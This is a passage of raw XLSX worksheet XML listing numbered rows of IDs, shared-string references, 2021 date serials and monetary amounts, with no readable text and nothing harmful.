      </c>
    </row>
    <row r="4474" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4474">
        <v>25080</v>
      </c>
      <c r="B4474">
        <v>5483</v>
      </c>
      <c r="C4474" t="s">
        <v>8763</v>
      </c>
      <c r="D4474" t="s">
        <v>13646</v>
      </c>
      <c r="E4474">
        <v>5</v>
      </c>
      <c r="F4474" t="s">
        <v>9928</v>
      </c>
      <c r="G4474" s="1">
        <v>44327</v>
      </c>
      <c r="H4474">
        <v>1500</v>
      </c>
      <c r="I4474" t="s">
        <v>13648</v>
      </c>
      <c r="J4474" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4475" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4475">
        <v>25081</v>
      </c>
      <c r="B4475">
        <v>5483</v>
      </c>
      <c r="C4475" t="s">
        <v>8763</v>
      </c>
      <c r="D4475" t="s">
        <v>13646</v>
      </c>
      <c r="E4475">
        <v>5</v>
      </c>
      <c r="F4475" t="s">
        <v>9648</v>
      </c>
      <c r="G4475" s="1">
        <v>44327</v>
      </c>
      <c r="H4475">
        <v>10000</v>
      </c>
      <c r="I4475" t="s">
        <v>13648</v>
      </c>
      <c r="J4475" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4476" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4476">
        <v>25082</v>
      </c>
      <c r="B4476">
        <v>5483</v>
      </c>
      <c r="C4476" t="s">
        <v>8763</v>
      </c>
      <c r="D4476" t="s">
        <v>13646</v>
      </c>
      <c r="E4476">
        <v>5</v>
      </c>
      <c r="F4476" t="s">
        <v>13650</v>
      </c>
      <c r="G4476" s="1">
        <v>44327</v>
      </c>
      <c r="H4476">
        <v>1500</v>
      </c>
      <c r="I4476" t="s">
        <v>13648</v>
      </c>
      <c r="J4476" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4477" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4477">
        <v>25083</v>
      </c>
      <c r="B4477">
        <v>5444</v>
      </c>
      <c r="C4477" t="s">
        <v>16550</v>
      </c>
      <c r="D4477" t="s">
        <v>16551</v>
      </c>
      <c r="E4477">
        <v>17</v>
      </c>
      <c r="F4477" t="s">
        <v>9561</v>
      </c>
      <c r="G4477" s="1">
        <v>44319</v>
      </c>
      <c r="H4477" s="4">
        <v>28500</v>
      </c>
      <c r="I4477" t="s">
        <v>13651</v>
      </c>
      <c r="J4477" t="s">
        <v>13652</v>
      </c>
    </row>
    <row r="4478" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4478">
        <v>25084</v>
      </c>
      <c r="B4478">
        <v>5485</v>
      </c>
      <c r="C4478" t="s">
        <v>8747</v>
      </c>
      <c r="D4478" t="s">
        <v>13653</v>
      </c>
      <c r="E4478">
        <v>5</v>
      </c>
      <c r="F4478" t="s">
        <v>13654</v>
      </c>
      <c r="G4478" s="1">
        <v>44327</v>
      </c>
      <c r="H4478">
        <v>3000</v>
      </c>
      <c r="I4478" t="s">
        <v>13324</v>
      </c>
      <c r="J4478" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4479" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4479">
        <v>25085</v>
      </c>
      <c r="B4479">
        <v>5485</v>
      </c>
      <c r="C4479" t="s">
        <v>8747</v>
      </c>
      <c r="D4479" t="s">
        <v>13653</v>
      </c>
      <c r="E4479">
        <v>5</v>
      </c>
      <c r="F4479" t="s">
        <v>9648</v>
      </c>
      <c r="G4479" s="1">
        <v>44327</v>
      </c>
      <c r="H4479">
        <v>8000</v>
      </c>
      <c r="I4479" t="s">
        <v>13324</v>
      </c>
      <c r="J4479" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4480" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4480">
        <v>25086</v>
      </c>
      <c r="B4480">
        <v>5485</v>
      </c>
      <c r="C4480" t="s">
        <v>8747</v>
      </c>
      <c r="D4480" t="s">
        <v>13653</v>
      </c>
      <c r="E4480">
        <v>5</v>
      </c>
      <c r="F4480" t="s">
        <v>13650</v>
      </c>
      <c r="G4480" s="1">
        <v>44327</v>
      </c>
      <c r="H4480">
        <v>4000</v>
      </c>
      <c r="I4480" t="s">
        <v>13324</v>
      </c>
      <c r="J4480" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4481" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4481">
        <v>25087</v>
      </c>
      <c r="B4481">
        <v>5485</v>
      </c>
      <c r="C4481" t="s">
        <v>8747</v>
      </c>
      <c r="D4481" t="s">
        <v>13653</v>
      </c>
      <c r="E4481">
        <v>5</v>
      </c>
      <c r="F4481" t="s">
        <v>13649</v>
      </c>
      <c r="G4481" s="1">
        <v>44327</v>
      </c>
      <c r="H4481">
        <v>7000</v>
      </c>
      <c r="I4481" t="s">
        <v>13324</v>
      </c>
      <c r="J4481" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4482" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4482">
        <v>25088</v>
      </c>
      <c r="B4482">
        <v>5485</v>
      </c>
      <c r="C4482" t="s">
        <v>8747</v>
      </c>
      <c r="D4482" t="s">
        <v>13653</v>
      </c>
      <c r="E4482">
        <v>5</v>
      </c>
      <c r="F4482" t="s">
        <v>9928</v>
      </c>
      <c r="G4482" s="1">
        <v>44327</v>
      </c>
      <c r="H4482">
        <v>1000</v>
      </c>
      <c r="I4482" t="s">
        <v>13655</v>
      </c>
      <c r="J4482" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4483" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4483">
        <v>25089</v>
      </c>
      <c r="B4483">
        <v>5444</v>
      </c>
      <c r="C4483" t="s">
        <v>16550</v>
      </c>
      <c r="D4483" t="s">
        <v>16551</v>
      </c>
      <c r="E4483">
        <v>17</v>
      </c>
      <c r="F4483" t="s">
        <v>9470</v>
      </c>
      <c r="G4483" s="1">
        <v>44319</v>
      </c>
      <c r="H4483" s="4">
        <v>25000</v>
      </c>
      <c r="I4483" t="s">
        <v>13651</v>
      </c>
      <c r="J4483" t="s">
        <v>13656</v>
      </c>
    </row>
    <row r="4484" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4484">
        <v>25090</v>
      </c>
      <c r="B4484">
        <v>1638</v>
      </c>
      <c r="C4484" t="s">
        <v>3210</v>
      </c>
      <c r="D4484" t="s">
        <v>13657</v>
      </c>
      <c r="E4484">
        <v>17</v>
      </c>
      <c r="F4484" t="s">
        <v>2236</v>
      </c>
      <c r="G4484" s="1">
        <v>44293</v>
      </c>
      <c r="H4484">
        <v>2880000</v>
      </c>
      <c r="I4484" t="s">
        <v>13658</v>
      </c>
      <c r="J4484" t="s">
        <v>13659</v>
      </c>
    </row>
    <row r="4485" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4485">
        <v>25091</v>
      </c>
      <c r="B4485">
        <v>2247</v>
      </c>
      <c r="C4485" t="s">
        <v>5426</v>
      </c>
      <c r="D4485" t="s">
        <v>13660</v>
      </c>
      <c r="E4485">
        <v>13</v>
      </c>
      <c r="F4485" t="s">
        <v>13661</v>
      </c>
      <c r="G4485" s="1">
        <v>44347</v>
      </c>
      <c r="H4485">
        <v>100000</v>
      </c>
      <c r="I4485" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4486" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4486">
        <v>25092</v>
      </c>
      <c r="B4486">
        <v>2247</v>
      </c>
      <c r="C4486" t="s">
        <v>5426</v>
      </c>
      <c r="D4486" t="s">
        <v>13660</v>
      </c>
      <c r="E4486">
        <v>13</v>
      </c>
      <c r="F4486" t="s">
        <v>13635</v>
      </c>
      <c r="G4486" s="1">
        <v>44347</v>
      </c>
      <c r="H4486">
        <v>100000</v>
      </c>
      <c r="I4486" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4487" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4487">
        <v>25093</v>
      </c>
      <c r="B4487">
        <v>2247</v>
      </c>
      <c r="C4487" t="s">
        <v>5426</v>
      </c>
      <c r="D4487" t="s">
        <v>13660</v>
      </c>
      <c r="E4487">
        <v>13</v>
      </c>
      <c r="F4487" t="s">
        <v>13636</v>
      </c>
      <c r="G4487" s="1">
        <v>44347</v>
      </c>
      <c r="H4487">
        <v>100000</v>
      </c>
      <c r="I4487" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4488" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4488">
        <v>25094</v>
      </c>
      <c r="B4488">
        <v>2247</v>
      </c>
      <c r="C4488" t="s">
        <v>5426</v>
      </c>
      <c r="D4488" t="s">
        <v>13660</v>
      </c>
      <c r="E4488">
        <v>13</v>
      </c>
      <c r="F4488" t="s">
        <v>13637</v>
      </c>
      <c r="G4488" s="1">
        <v>44347</v>
      </c>
      <c r="H4488">
        <v>100000</v>
      </c>
      <c r="I4488" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4489" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4489">
        <v>25095</v>
      </c>
      <c r="B4489">
        <v>2247</v>
      </c>
      <c r="C4489" t="s">
        <v>5426</v>
      </c>
      <c r="D4489" t="s">
        <v>13660</v>
      </c>
      <c r="E4489">
        <v>13</v>
      </c>
      <c r="F4489" t="s">
        <v>9561</v>
      </c>
      <c r="G4489" s="1">
        <v>44347</v>
      </c>
      <c r="H4489">
        <v>100000</v>
      </c>
      <c r="I4489" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="4490" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4490">
        <v>25096</v>
      </c>
      <c r="B4490">
        <v>2247</v>
      </c>
      <c r="C4490" t="s">
        <v>5426</v>
      </c>
      <c r="D4490" t="s">
        <v>13660</v>
      </c>
      <c r="E4490">
        <v>13</v>
      </c>
      <c r="F4490" t="s">
        <v>9676</v>
      </c>
      <c r="G4490" s="1">
        <v>44347</v>
      </c>
      <c r="H4490">
        <v>100000</v>
      </c>
      <c r="I4490" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="4491" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4491">
        <v>25097</v>
      </c>
      <c r="B4491">
        <v>2247</v>
      </c>
      <c r="C4491" t="s">
        <v>5426</v>
      </c>
      <c r="D4491" t="s">
        <v>13660</v>
      </c>
      <c r="E4491">
        <v>13</v>
      </c>
      <c r="F4491" t="s">
        <v>2236</v>
      </c>
      <c r="G4491" s="1">
        <v>44347</v>
      </c>
      <c r="H4491">
        <v>100000</v>
      </c>
      <c r="I4491" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4492" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4492">
        <v>25098</v>
      </c>
      <c r="B4492">
        <v>2247</v>
      </c>
      <c r="C4492" t="s">
        <v>5426</v>
      </c>
      <c r="D4492" t="s">
        <v>13660</v>
      </c>
      <c r="E4492">
        <v>13</v>
      </c>
      <c r="F4492" t="s">
        <v>4686</v>
      </c>
      <c r="G4492" s="1">
        <v>44347</v>
      </c>
      <c r="H4492">
        <v>100000</v>
      </c>
      <c r="I4492" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4493" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4493">
        <v>25099</v>
      </c>
      <c r="B4493">
        <v>2247</v>
      </c>
      <c r="C4493" t="s">
        <v>5426</v>
      </c>
      <c r="D4493" t="s">
        <v>13660</v>
      </c>
      <c r="E4493">
        <v>13</v>
      </c>
      <c r="F4493" t="s">
        <v>1746</v>
      </c>
      <c r="G4493" s="1">
        <v>44347</v>
      </c>
      <c r="H4493">
        <v>10000</v>
      </c>
      <c r="I4493" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4494" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4494">
        <v>25100</v>
      </c>
      <c r="B4494">
        <v>2247</v>
      </c>
      <c r="C4494" t="s">
        <v>5426</v>
      </c>
      <c r="D4494" t="s">
        <v>13660</v>
      </c>
      <c r="E4494">
        <v>13</v>
      </c>
      <c r="F4494" t="s">
        <v>3814</v>
      </c>
      <c r="G4494" s="1">
        <v>44347</v>
      </c>
      <c r="H4494">
        <v>10000</v>
      </c>
      <c r="I4494" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4495" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4495">
        <v>25101</v>
      </c>
      <c r="B4495">
        <v>2247</v>
      </c>
      <c r="C4495" t="s">
        <v>5426</v>
      </c>
      <c r="D4495" t="s">
        <v>13660</v>
      </c>
      <c r="E4495">
        <v>13</v>
      </c>
      <c r="F4495" t="s">
        <v>9925</v>
      </c>
      <c r="G4495" s="1">
        <v>44347</v>
      </c>
      <c r="H4495">
        <v>100</v>
      </c>
      <c r="I4495" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4496" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4496">
        <v>25102</v>
      </c>
      <c r="B4496">
        <v>2247</v>
      </c>
      <c r="C4496" t="s">
        <v>5426</v>
      </c>
      <c r="D4496" t="s">
        <v>13660</v>
      </c>
      <c r="E4496">
        <v>13</v>
      </c>
      <c r="F4496" t="s">
        <v>7296</v>
      </c>
      <c r="G4496" s="1">
        <v>44347</v>
      </c>
      <c r="H4496">
        <v>100</v>
      </c>
      <c r="I4496" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4497" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4497">
        <v>25103</v>
      </c>
      <c r="B4497">
        <v>1384</v>
      </c>
      <c r="C4497" t="s">
        <v>1719</v>
      </c>
      <c r="D4497" t="s">
        <v>11484</v>
      </c>
      <c r="E4497">
        <v>2</v>
      </c>
      <c r="F4497" t="s">
        <v>11332</v>
      </c>
      <c r="G4497" s="1">
        <v>44320</v>
      </c>
      <c r="H4497">
        <v>4849390</v>
      </c>
      <c r="I4497" t="s">
        <v>9485</v>
      </c>
      <c r="J4497" t="s">
        <v>13662</v>
      </c>
    </row>
    <row r="4498" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4498">
        <v>25104</v>
      </c>
      <c r="B4498">
        <v>1759</v>
      </c>
      <c r="C4498" t="s">
        <v>16552</v>
      </c>
      <c r="D4498" t="s">
        <v>16553</v>
      </c>
      <c r="E4498">
        <v>16</v>
      </c>
      <c r="F4498" t="s">
        <v>9458</v>
      </c>
      <c r="G4498" s="1">
        <v>44327</v>
      </c>
      <c r="H4498" s="4">
        <v>20000</v>
      </c>
      <c r="J4498" t="s">
        <v>13663</v>
      </c>
    </row>
    <row r="4499" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4499">
        <v>25105</v>
      </c>
      <c r="B4499">
        <v>1759</v>
      </c>
      <c r="C4499" t="s">
        <v>16552</v>
      </c>
      <c r="D4499" t="s">
        <v>16553</v>
      </c>
      <c r="E4499">
        <v>16</v>
      </c>
      <c r="F4499" t="s">
        <v>9838</v>
      </c>
      <c r="G4499" s="1">
        <v>44327</v>
      </c>
      <c r="H4499" s="4">
        <v>15000</v>
      </c>
      <c r="I4499" t="s">
        <v>10449</v>
      </c>
      <c r="J4499" t="s">
        <v>13663</v>
      </c>
    </row>
    <row r="4500" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4500">
        <v>25106</v>
      </c>
      <c r="B4500">
        <v>1759</v>
      </c>
      <c r="C4500" t="s">
        <v>16552</v>
      </c>
      <c r="D4500" t="s">
        <v>16553</v>
      </c>
      <c r="E4500">
        <v>16</v>
      </c>
      <c r="F4500" t="s">
        <v>7564</v>
      </c>
      <c r="G4500" s="1">
        <v>44327</v>
      </c>
      <c r="H4500" s="4">
        <v>5000</v>
      </c>
      <c r="I4500" t="s">
        <v>10449</v>
      </c>
      <c r="J4500" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="4501" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4501">
        <v>25107</v>
      </c>
      <c r="B4501">
        <v>1759</v>
      </c>
      <c r="C4501" t="s">
        <v>16552</v>
      </c>
      <c r="D4501" t="s">
        <v>16553</v>
      </c>
      <c r="E4501">
        <v>16</v>
      </c>
      <c r="F4501" t="s">
        <v>547</v>
      </c>
      <c r="G4501" s="1">
        <v>44327</v>
      </c>
      <c r="H4501" s="4">
        <v>5000</v>
      </c>
      <c r="I4501" t="s">
        <v>13664</v>
      </c>
      <c r="J4501" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="4502" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4502">
        <v>25111</v>
      </c>
      <c r="B4502">
        <v>716</v>
      </c>
      <c r="C4502" t="s">
        <v>1252</v>
      </c>
      <c r="D4502" t="s">
        <v>11044</v>
      </c>
      <c r="E4502">
        <v>2</v>
      </c>
      <c r="F4502" t="s">
        <v>1746</v>
      </c>
      <c r="G4502" s="1">
        <v>44341</v>
      </c>
      <c r="H4502">
        <v>100000</v>
      </c>
      <c r="J4502" t="s">
        <v>13665</v>
      </c>
    </row>
    <row r="4503" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4503">
        <v>25112</v>
      </c>
      <c r="B4503">
        <v>716</v>
      </c>
      <c r="C4503" t="s">
        <v>1252</v>
      </c>
      <c r="D4503" t="s">
        <v>11044</v>
      </c>
      <c r="E4503">
        <v>2</v>
      </c>
      <c r="F4503" t="s">
        <v>4508</v>
      </c>
      <c r="G4503" s="1">
        <v>44341</v>
      </c>
      <c r="H4503">
        <v>50000</v>
      </c>
      <c r="J4503" t="s">
        <v>13665</v>
      </c>
    </row>
    <row r="4504" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4504">
        <v>25113</v>
      </c>
      <c r="B4504">
        <v>5456</v>
      </c>
      <c r="C4504" t="s">
        <v>8731</v>
      </c>
      <c r="D4504" t="s">
        <v>13666</v>
      </c>
      <c r="E4504">
        <v>5</v>
      </c>
      <c r="F4504" t="s">
        <v>3814</v>
      </c>
      <c r="G4504" s="1">
        <v>44323</v>
      </c>
      <c r="H4504">
        <v>0</v>
      </c>
      <c r="I4504" t="s">
        <v>9638</v>
      </c>
      <c r="J4504" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4505" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4505">
        <v>25114</v>
      </c>
      <c r="B4505">
        <v>5561</v>
      </c>
      <c r="C4505" t="s">
        <v>8992</v>
      </c>
      <c r="D4505" t="s">
        <v>13667</v>
      </c>
      <c r="E4505">
        <v>26</v>
      </c>
      <c r="F4505" t="s">
        <v>13668</v>
      </c>
      <c r="G4505" s="1">
        <v>44314</v>
      </c>
      <c r="H4505">
        <v>80000</v>
      </c>
      <c r="I4505" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="4506" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4506">
        <v>25115</v>
      </c>
      <c r="B4506">
        <v>5561</v>
      </c>
      <c r="C4506" t="s">
        <v>8992</v>
      </c>
      <c r="D4506" t="s">
        <v>13667</v>
      </c>
      <c r="E4506">
        <v>26</v>
      </c>
      <c r="F4506" t="s">
        <v>609</v>
      </c>
      <c r="G4506" s="1">
        <v>44314</v>
      </c>
      <c r="H4506">
        <v>80000</v>
      </c>
      <c r="I4506" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="4507" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4507">
        <v>25116</v>
      </c>
      <c r="B4507">
        <v>1531</v>
      </c>
      <c r="C4507" t="s">
        <v>16554</v>
      </c>
      <c r="D4507" t="s">
        <v>16555</v>
      </c>
      <c r="E4507">
        <v>12</v>
      </c>
      <c r="F4507" t="s">
        <v>9820</v>
      </c>
      <c r="G4507" s="1">
        <v>44301</v>
      </c>
      <c r="H4507" s="4">
        <v>200000</v>
      </c>
      <c r="I4507" t="s">
        <v>10546</v>
      </c>
      <c r="J4507" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="4508" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4508">
        <v>25117</v>
      </c>
      <c r="B4508">
        <v>1531</v>
      </c>
      <c r="C4508" t="s">
        <v>16554</v>
      </c>
      <c r="D4508" t="s">
        <v>16555</v>
      </c>
      <c r="E4508">
        <v>12</v>
      </c>
      <c r="F4508" t="s">
        <v>13670</v>
      </c>
      <c r="G4508" s="1">
        <v>44301</v>
      </c>
      <c r="H4508" s="4">
        <v>200000</v>
      </c>
      <c r="I4508" t="s">
        <v>10546</v>
      </c>
      <c r="J4508" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="4509" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4509">
        <v>25118</v>
      </c>
      <c r="B4509">
        <v>1531</v>
      </c>
      <c r="C4509" t="s">
        <v>16554</v>
      </c>
      <c r="D4509" t="s">
        <v>16555</v>
      </c>
      <c r="E4509">
        <v>12</v>
      </c>
      <c r="F4509" t="s">
        <v>9437</v>
      </c>
      <c r="G4509" s="1">
        <v>44301</v>
      </c>
      <c r="H4509" s="4">
        <v>500000</v>
      </c>
      <c r="I4509" t="s">
        <v>9550</v>
      </c>
      <c r="J4509" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="4510" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4510">
        <v>25119</v>
      </c>
      <c r="B4510">
        <v>1531</v>
      </c>
      <c r="C4510" t="s">
        <v>16554</v>
      </c>
      <c r="D4510" t="s">
        <v>16555</v>
      </c>
      <c r="E4510">
        <v>12</v>
      </c>
      <c r="F4510" t="s">
        <v>9459</v>
      </c>
      <c r="G4510" s="1">
        <v>44301</v>
      </c>
      <c r="H4510" s="4">
        <v>100000</v>
      </c>
      <c r="I4510" t="s">
        <v>9550</v>
      </c>
      <c r="J4510" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="4511" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4511">
        <v>25120</v>
      </c>
      <c r="B4511">
        <v>4840</v>
      </c>
      <c r="C4511" t="s">
        <v>7352</v>
      </c>
      <c r="D4511" t="s">
        <v>13671</v>
      </c>
      <c r="E4511">
        <v>16</v>
      </c>
      <c r="F4511" t="s">
        <v>13672</v>
      </c>
      <c r="G4511" s="1">
        <v>44344</v>
      </c>
      <c r="H4511">
        <v>3000</v>
      </c>
      <c r="I4511" t="s">
        <v>13673</v>
      </c>
    </row>
    <row r="4512" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4512">
        <v>25121</v>
      </c>
      <c r="B4512">
        <v>4840</v>
      </c>
      <c r="C4512" t="s">
        <v>7352</v>
      </c>
      <c r="D4512" t="s">
        <v>13671</v>
      </c>
      <c r="E4512">
        <v>16</v>
      </c>
      <c r="F4512" t="s">
        <v>8778</v>
      </c>
      <c r="G4512" s="1">
        <v>44344</v>
      </c>
      <c r="H4512">
        <v>2000</v>
      </c>
      <c r="I4512" t="s">
        <v>13674</v>
      </c>
    </row>
    <row r="4513" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4513">
        <v>25122</v>
      </c>
      <c r="B4513">
        <v>4840</v>
      </c>
      <c r="C4513" t="s">
        <v>7352</v>
      </c>
      <c r="D4513" t="s">
        <v>13671</v>
      </c>
      <c r="E4513">
        <v>16</v>
      </c>
      <c r="F4513" t="s">
        <v>3341</v>
      </c>
      <c r="G4513" s="1">
        <v>44344</v>
      </c>
      <c r="H4513">
        <v>1000</v>
      </c>
      <c r="I4513" t="s">
        <v>13675</v>
      </c>
    </row>
    <row r="4514" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4514">
        <v>25123</v>
      </c>
      <c r="B4514">
        <v>4840</v>
      </c>
      <c r="C4514" t="s">
        <v>7352</v>
      </c>
      <c r="D4514" t="s">
        <v>13671</v>
      </c>
      <c r="E4514">
        <v>16</v>
      </c>
      <c r="F4514" t="s">
        <v>6569</v>
      </c>
      <c r="G4514" s="1">
        <v>44344</v>
      </c>
      <c r="H4514">
        <v>1500</v>
      </c>
      <c r="I4514" t="s">
        <v>13676</v>
      </c>
    </row>
    <row r="4515" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4515">
        <v>25124</v>
      </c>
      <c r="B4515">
        <v>5554</v>
      </c>
      <c r="C4515" t="s">
        <v>5245</v>
      </c>
      <c r="D4515" t="s">
        <v>13677</v>
      </c>
      <c r="E4515">
        <v>26</v>
      </c>
      <c r="F4515" t="s">
        <v>364</v>
      </c>
      <c r="G4515" s="1">
        <v>44368</v>
      </c>
      <c r="H4515">
        <v>1000000</v>
      </c>
      <c r="J4515" t="s">
        <v>13678</v>
      </c>
    </row>
    <row r="4516" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4516">
        <v>25125</v>
      </c>
      <c r="B4516">
        <v>1367</v>
      </c>
      <c r="C4516" t="s">
        <v>2629</v>
      </c>
      <c r="D4516" t="s">
        <v>13679</v>
      </c>
      <c r="E4516">
        <v>16</v>
      </c>
      <c r="F4516" t="s">
        <v>9458</v>
      </c>
      <c r="G4516" s="1">
        <v>44327</v>
      </c>
      <c r="H4516">
        <v>15000</v>
      </c>
      <c r="I4516" t="s">
        <v>13680</v>
      </c>
      <c r="J4516" t="s">
        <v>13681</v>
      </c>
    </row>
    <row r="4517" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4517">
        <v>25126</v>
      </c>
      <c r="B4517">
        <v>1367</v>
      </c>
      <c r="C4517" t="s">
        <v>2629</v>
      </c>
      <c r="D4517" t="s">
        <v>13679</v>
      </c>
      <c r="E4517">
        <v>16</v>
      </c>
      <c r="F4517" t="s">
        <v>9838</v>
      </c>
      <c r="G4517" s="1">
        <v>44327</v>
      </c>
      <c r="H4517">
        <v>15000</v>
      </c>
      <c r="I4517" t="s">
        <v>11980</v>
      </c>
      <c r="J4517" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4518" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4518">
        <v>25127</v>
      </c>
      <c r="B4518">
        <v>1367</v>
      </c>
      <c r="C4518" t="s">
        <v>2629</v>
      </c>
      <c r="D4518" t="s">
        <v>13679</v>
      </c>
      <c r="E4518">
        <v>16</v>
      </c>
      <c r="F4518" t="s">
        <v>547</v>
      </c>
      <c r="G4518" s="1">
        <v>44327</v>
      </c>
      <c r="H4518">
        <v>1000</v>
      </c>
      <c r="I4518" t="s">
        <v>13680</v>
      </c>
      <c r="J4518" t="s">
        <v>11939</v>
      </c>
    </row>
    <row r="4519" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4519">
        <v>25128</v>
      </c>
      <c r="B4519">
        <v>1367</v>
      </c>
      <c r="C4519" t="s">
        <v>2629</v>
      </c>
      <c r="D4519" t="s">
        <v>13679</v>
      </c>
      <c r="E4519">
        <v>16</v>
      </c>
      <c r="F4519" t="s">
        <v>13682</v>
      </c>
      <c r="G4519" s="1">
        <v>44327</v>
      </c>
      <c r="H4519">
        <v>1000</v>
      </c>
      <c r="I4519" t="s">
        <v>11980</v>
      </c>
      <c r="J4519" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4520" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4520">
        <v>25129</v>
      </c>
      <c r="B4520">
        <v>1367</v>
      </c>
      <c r="C4520" t="s">
        <v>2629</v>
      </c>
      <c r="D4520" t="s">
        <v>13679</v>
      </c>
      <c r="E4520">
        <v>16</v>
      </c>
      <c r="F4520" t="s">
        <v>13683</v>
      </c>
      <c r="G4520" s="1">
        <v>44327</v>
      </c>
      <c r="H4520">
        <v>1000</v>
      </c>
      <c r="I4520" t="s">
        <v>13684</v>
      </c>
      <c r="J4520" t="s">
        <v>13685</v>
      </c>
    </row>
    <row r="4521" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4521">
        <v>25130</v>
      </c>
      <c r="B4521">
        <v>1367</v>
      </c>
      <c r="C4521" t="s">
        <v>2629</v>
      </c>
      <c r="D4521" t="s">
        <v>13679</v>
      </c>
      <c r="E4521">
        <v>16</v>
      </c>
      <c r="F4521" t="s">
        <v>13686</v>
      </c>
      <c r="G4521" s="1">
        <v>44327</v>
      </c>
      <c r="H4521">
        <v>1000</v>
      </c>
      <c r="I4521" t="s">
        <v>9571</v>
      </c>
      <c r="J4521" t="s">
        <v>13685</v>
      </c>
    </row>
    <row r="4522" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4522">
        <v>25131</v>
      </c>
      <c r="B4522">
        <v>2608</v>
      </c>
      <c r="C4522" t="s">
        <v>16341</v>
      </c>
      <c r="D4522" t="s">
        <v>16342</v>
      </c>
      <c r="E4522">
        <v>2</v>
      </c>
      <c r="F4522" t="s">
        <v>13687</v>
      </c>
      <c r="G4522" s="1">
        <v>44322</v>
      </c>
      <c r="H4522" s="4">
        <v>22000</v>
      </c>
      <c r="I4522" t="s">
        <v>13688</v>
      </c>
      <c r="J4522" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4523" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4523">
        <v>25132</v>
      </c>
      <c r="B4523">
        <v>2608</v>
      </c>
      <c r="C4523" t="s">
        <v>16341</v>
      </c>
      <c r="D4523" t="s">
        <v>16342</v>
      </c>
      <c r="E4523">
        <v>2</v>
      </c>
      <c r="F4523" t="s">
        <v>13689</v>
      </c>
      <c r="G4523" s="1">
        <v>44322</v>
      </c>
      <c r="H4523" s="4">
        <v>49000</v>
      </c>
      <c r="I4523" t="s">
        <v>13690</v>
      </c>
      <c r="J4523" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4524" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4524">
        <v>25133</v>
      </c>
      <c r="B4524">
        <v>529</v>
      </c>
      <c r="C4524" t="s">
        <v>2389</v>
      </c>
      <c r="D4524" t="s">
        <v>13691</v>
